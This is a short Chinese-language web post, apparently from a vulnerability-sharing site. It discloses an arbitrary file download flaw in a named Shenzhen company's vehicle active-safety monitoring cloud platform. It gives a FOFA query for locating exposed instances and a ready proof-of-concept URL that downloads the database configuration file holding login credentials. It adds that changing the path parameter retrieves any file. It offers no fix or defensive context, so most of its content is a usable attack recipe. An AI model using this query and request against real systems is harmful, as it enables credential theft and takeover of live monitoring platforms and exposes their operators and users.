赞
踩
深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码
FOFA语法:body="./open/webApi.html"
获取网站数据库配置文件
POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
可直接下载到该文件
替换path=后的文件可导致任意文件下载:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。